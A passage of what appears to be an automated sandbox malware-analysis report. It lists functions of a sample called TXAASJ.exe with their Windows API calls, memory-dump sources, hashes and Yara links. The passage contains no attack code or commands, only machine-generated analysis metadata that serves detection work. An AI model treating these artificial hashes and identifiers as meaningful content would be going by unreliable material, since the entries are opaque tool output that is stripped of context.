                                                                                                                        • Opcode Fuzzy Hash: 731b4fa079a6662fdfc9064dea4d0f869ac531d126548af6ca3c5b02857d2ddb
                                                                                                                        • Instruction Fuzzy Hash: 4421C072204206AADB21AB34CD41FFE77ED9F80385F01182DFD5AA6151EF31ED099760
                                                                                                                        Function 00E53682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsThemeActive.UXTHEME ref: 00E536E6
                                                                                                                          • Part of subcall function 00E72025: __lock.LIBCMT ref: 00E7202B
                                                                                                                          • Part of subcall function 00E532DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E532F6
                                                                                                                          • Part of subcall function 00E532DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E5330B
                                                                                                                          • Part of subcall function 00E5374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00E5376D
                                                                                                                          • Part of subcall function 00E5374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00E5377F
                                                                                                                          • Part of subcall function 00E5374E: GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00000104,?,00F11120,C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00F11124,?,?), ref: 00E537EE
                                                                                                                          • Part of subcall function 00E5374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00E53860
                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00E53726
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 924797094-0
                                                                                                                        • Opcode ID: ab827749207965d6f8320be4be5628416663591df28e7447a40edb493c76250a
                                                                                                                        • Instruction ID: 6748aeeb1bc98bd45cff2a81da592c05dae33a4b4ef50fa05051db83db6654e1
                                                                                                                        • Opcode Fuzzy Hash: ab827749207965d6f8320be4be5628416663591df28e7447a40edb493c76250a
                                                                                                                        • Instruction Fuzzy Hash: 3C11FD708083048FC320EF69EC0594ABFE8FB88350F00890FF549A32B1DB709A44CB92
                                                                                                                        Function 00E7F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___lock_fhandle.LIBCMT ref: 00E7F7D9
                                                                                                                        • __close_nolock.LIBCMT ref: 00E7F7F2
                                                                                                                          • Part of subcall function 00E7886A: __getptd_noexit.LIBCMT ref: 00E7886A
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1046115767-0
                                                                                                                        • Opcode ID: 0f69c37c2ab81adf9d0803943861684cd757a934a2ccbd136c8224bbc8067e8a
                                                                                                                        • Instruction ID: 8b9818c4cd63b671d43f3be5580b27ef03f7d6f3236ab3b4b9177bfa86b87ce8
                                                                                                                        • Opcode Fuzzy Hash: 0f69c37c2ab81adf9d0803943861684cd757a934a2ccbd136c8224bbc8067e8a
                                                                                                                        • Instruction Fuzzy Hash: 2C1102329056108EE709BFA8D94539836D05F51331F96E261E46C7F2E3CBB45901D7A3
                                                                                                                        Function 00E7010A Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E745EC: __FF_MSGBANNER.LIBCMT ref: 00E74603
                                                                                                                          • Part of subcall function 00E745EC: __NMSG_WRITE.LIBCMT ref: 00E7460A
                                                                                                                          • Part of subcall function 00E745EC: RtlAllocateHeap.NTDLL(01130000,00000000,00000001,?,?,?,?,00E70127,?,00E5125D,00000058,?,?), ref: 00E7462F
                                                                                                                        • std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                          • Part of subcall function 00E77495: RaiseException.KERNEL32(?,?,00E5125D,00F06598,?,?,?,00E70158,00E5125D,00F06598,?,00000001), ref: 00E774E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3902256705-0
                                                                                                                        • Opcode ID: 889122ba67737e8bbdc414ede14c6fa60c2343c4679c317a4f647b477db02990
                                                                                                                        • Instruction ID: 74b9690ea623a1599a6983d40304717d1d17112574bcc8a19b9e1e8ebbd6e806
                                                                                                                        • Opcode Fuzzy Hash: 889122ba67737e8bbdc414ede14c6fa60c2343c4679c317a4f647b477db02990
                                                                                                                        • Instruction Fuzzy Hash: 45F0C83510921EE6C715ABA8DC029DE77EC9F05354F90E416F90CF61C1DBB0CA9197A5
                                                                                                                        Function 00E74274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        • __lock_file.LIBCMT ref: 00E742B9
                                                                                                                          • Part of subcall function 00E75A9F: __lock.LIBCMT ref: 00E75AC2
                                                                                                                        • __fclose_nolock.LIBCMT ref: 00E742C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2800547568-0
                                                                                                                        • Opcode ID: ab5d698cd528637d7b24264d3a66e8133deaf5588a6c953f512aaeb243f0b2b4
                                                                                                                        • Instruction ID: f814fe980a93cbb5f39279e3915cc5ff5014eb4049d9b8f06943952659de04f1
                                                                                                                        • Opcode Fuzzy Hash: ab5d698cd528637d7b24264d3a66e8133deaf5588a6c953f512aaeb243f0b2b4
                                                                                                                        • Instruction Fuzzy Hash: 22F024B19043558AD710AB75880279E67D06F40335F21E20AF86CBB1E3CB7C89019F42
                                                                                                                        Function 00E71D65 Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00E71D6B
                                                                                                                          • Part of subcall function 00E71D33: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,P,?,?,00E71D70,00E70127,?,00E78A37,000000FF,0000001E,00F068C8,00000008,00E7899B,00E70127,00E70127), ref: 00E71D42
                                                                                                                          • Part of subcall function 00E71D33: GetProcAddress.KERNEL32(P,CorExitProcess), ref: 00E71D54
                                                                                                                        • ExitProcess.KERNEL32 ref: 00E71D74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2427264223-0
                                                                                                                        • Opcode ID: a01e97bbd008e40042c7a73f49a5b3c8817fc170863fb35abdd9c1a33f6e27d5
                                                                                                                        • Instruction ID: c30373c49ba67a3ff49ffec2946616de8c54720ec424faa2471da5e78d571f4c
                                                                                                                        • Opcode Fuzzy Hash: a01e97bbd008e40042c7a73f49a5b3c8817fc170863fb35abdd9c1a33f6e27d5
                                                                                                                        • Instruction Fuzzy Hash: 80B09230004208BFCB022F16ED0A8483F69EB00391B008025F90818031DBB2AA919AC1
                                                                                                                        Function 00E5B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: 1881b95582f27488270194163bdcf0f55d1034154a259e89151eb0eef9976d72
                                                                                                                        • Instruction ID: b4869dfaf665b147f7f7dc5358b2b5684ddf9b6727e967af10e67f85f04bec67
                                                                                                                        • Opcode Fuzzy Hash: 1881b95582f27488270194163bdcf0f55d1034154a259e89151eb0eef9976d72
                                                                                                                        • Instruction Fuzzy Hash: FF41BD79200A02CFC724DF19D481A62F7E0FF88362714D92EEC9A9B761DB30E856CB50
                                                                                                                        Function 00ECAA5A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClearVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1473721057-0
                                                                                                                        • Opcode ID: 5f8600b4818a02f9a64b3da853d9b39d91995f732d9770231f5da73c5e9a8de0
                                                                                                                        • Instruction ID: 043b63f019b3cd94dbab767d4161a3f9d668b5f1c27b0728c50d743057c2f143
                                                                                                                        • Opcode Fuzzy Hash: 5f8600b4818a02f9a64b3da853d9b39d91995f732d9770231f5da73c5e9a8de0
                                                                                                                        • Instruction Fuzzy Hash: 42417E70504651CFDB25CF14D444B1ABBE1BF85348F1895ACE9996B362C332EC85CF52
                                                                                                                        Function 00E53F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E53F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00E53F90
                                                                                                                          • Part of subcall function 00E74129: __wfsopen.LIBCMT ref: 00E74134
                                                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00E534E2,?,00000001), ref: 00E53FCD
                                                                                                                          • Part of subcall function 00E53E78: FreeLibrary.KERNEL32(00000000), ref: 00E53EAB
                                                                                                                          • Part of subcall function 00E54010: _memmove.LIBCMT ref: 00E5405A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1396898556-0
                                                                                                                        • Opcode ID: e6279048d880e93d4aa4535589076f463c900a7a14599108c46a7d59ded0af28
                                                                                                                        • Instruction ID: 9c61c393d9abbed51ce806fdb788d693e2210da70b2c028f986141a04794905c
                                                                                                                        • Opcode Fuzzy Hash: e6279048d880e93d4aa4535589076f463c900a7a14599108c46a7d59ded0af28
                                                                                                                        • Instruction Fuzzy Hash: 5011C172600305AACB15BB74DD03F9E76E59F40745F209C29F942F61C1EF71AA499B50
                                                                                                                        Function 00ECAB2A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClearVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1473721057-0
                                                                                                                        • Opcode ID: ec18c06c8fb8301a30f3b259af1b7b919d49625c47af28329584dd031479a189
                                                                                                                        • Instruction ID: 2ab4b28eaf48eff739ef7d57a580888faf4607ff9d96742a66a57b9e440d5dbb
                                                                                                                        • Opcode Fuzzy Hash: ec18c06c8fb8301a30f3b259af1b7b919d49625c47af28329584dd031479a189
                                                                                                                        • Instruction Fuzzy Hash: 07217A70548211CFDB25CF25D445B1BBBE2BF89388F14996CF99567222C331E845CF52
                                                                                                                        Function 00E5CAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                        • Instruction ID: d9c7a57e4077c9d79076faa91b5d1d40ce210178fe42bdb8f026f25378a4ff05
                                                                                                                        • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                        • Instruction Fuzzy Hash: 7501F972200701AED3649B78D807A66BBD8DF447A0F60DD2EF95EEB1D1FB71E5048A50
                                                                                                                        Function 00E53E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00E534E2,?,00000001), ref: 00E53E6D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3664257935-0
                                                                                                                        • Opcode ID: 9c07fcc7b1206e6b8190359bbddf151b3618e892a72a573b145277e52d10f93a
                                                                                                                        • Instruction ID: 6f06cb8ed1c1a04519e673e9b68ed31d65a5310b6408561fb23fa85351e4b1d3
                                                                                                                        • Opcode Fuzzy Hash: 9c07fcc7b1206e6b8190359bbddf151b3618e892a72a573b145277e52d10f93a
                                                                                                                        • Instruction Fuzzy Hash: C3F0A9B0001341CFCB348F34E891856BBE0EF0475A3209E3EE9C7A2621CB319A48CF00
                                                                                                                        Function 00E72011 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _doexit.LIBCMT ref: 00E7201B
                                                                                                                          • Part of subcall function 00E71EE2: __lock.LIBCMT ref: 00E71EF0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __lock_doexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 368792745-0
                                                                                                                        • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                        • Instruction ID: a46b23fbd8f2bc0da3ce8f65ecf9f15426b66eb13734d564889a998bf441a480
                                                                                                                        • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                        • Instruction Fuzzy Hash: 84B0123158430D33E9102D85EC03F053B4C8750B50F204060FE0C2C1E1E593B56841C9
                                                                                                                        Function 00E74129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wfsopen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 197181222-0
                                                                                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                        • Instruction ID: 4a1361fbc5f9cc81c0d08e22745d1fbb50bb5d157695cafc109171fcfe7bb26a
                                                                                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                        • Instruction Fuzzy Hash: CCB092B244130C77CE012A82EC02A493B599B50660F40C020FB0C281A1A673AAA09A89

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00EBF5D0 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00EBF64E
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EBF6AD
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EBF6EA
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EBF711
                                                                                                                        • SendMessageW.USER32 ref: 00EBF737
                                                                                                                        • _wcsncpy.LIBCMT ref: 00EBF7A3
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00EBF7C4
                                                                                                                        • GetKeyState.USER32(00000009), ref: 00EBF7D1
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EBF7E7
                                                                                                                        • GetKeyState.USER32(00000010), ref: 00EBF7F1
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EBF820
                                                                                                                        • SendMessageW.USER32 ref: 00EBF843
                                                                                                                        • SendMessageW.USER32(?,00001030,?,00EBDE69), ref: 00EBF940
                                                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00EBF956
                                                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EBF967
                                                                                                                        • SetCapture.USER32(?), ref: 00EBF970
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00EBF9D4
                                                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EBF9E0
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00EBF9FA
                                                                                                                        • ReleaseCapture.USER32 ref: 00EBFA05
                                                                                                                        • GetCursorPos.USER32(?), ref: 00EBFA3A
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00EBFA47
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EBFAA9
                                                                                                                        • SendMessageW.USER32 ref: 00EBFAD3
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EBFB12
                                                                                                                        • SendMessageW.USER32 ref: 00EBFB3D
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EBFB55
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EBFB60
                                                                                                                        • GetCursorPos.USER32(?), ref: 00EBFB81
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00EBFB8E
                                                                                                                        • GetParent.USER32(?), ref: 00EBFBAA
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EBFC10
                                                                                                                        • SendMessageW.USER32 ref: 00EBFC40
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00EBFC96
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EBFCC2
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EBFCEA
                                                                                                                        • SendMessageW.USER32 ref: 00EBFD0D
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00EBFD57
